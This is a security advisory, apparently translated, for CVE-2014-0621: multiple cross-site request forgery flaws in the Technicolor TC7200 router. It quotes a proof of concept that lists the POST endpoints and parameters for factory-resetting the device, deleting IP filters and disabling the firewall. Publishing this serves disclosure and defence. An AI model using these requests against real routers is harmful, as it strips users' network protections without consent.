Release date:
Updated on:
Affected Systems:
Technicolor TC7200 STD6.01.12
Description:
--------------------------------------------------------------------------------
CVE (CAN) ID: CVE-2014-0621
Technicolor TC7200 is a modem and router product.
Technicolor TC7200 has multiple cross-site Request Forgery vulnerabilities. After successful exploitation, you can change the IP filtering options and firewall settings.
<* Source: Jeroen
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# Exploit Title: Technicolor TC7200-Multiple CSRF Vulnerabilities
# Google Dork: N/
# Date: 02-01-2013
# Exploit Author: Jeroen-IT Nerdbox
# Vendor Homepage:
Http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew
Ays/cable-modems-gateways/tc7200-tc7300
# Software Link: N/
# Version: STD6.01.12
# Tested on: N/
# CVE: CVE-2014-0621
#
# Proof of Concept:
#
#
# Payload for Factory Reset:
#
# POST: http: // <ip>/goform/system/factory
# Parameter: None
#
# Payload to disable the advanced options:
#
# POST: http: // <ip>/goform/advanced/options
# Parameter: None
#
# Payload to remove ip-filters:
#
# POST: http: // <ip> // goform/advanced/ip-filters
# Parameter: IpFilterAddressDelete1 = 1
#
# Payload to remove firewall settings
#
# POST: http: // <ip>/goform/advanced/firewall
# Parameter: cbFirewall = 1
#
# Check out the video at: http://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Technicolor
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew ays/cable-modems-megawa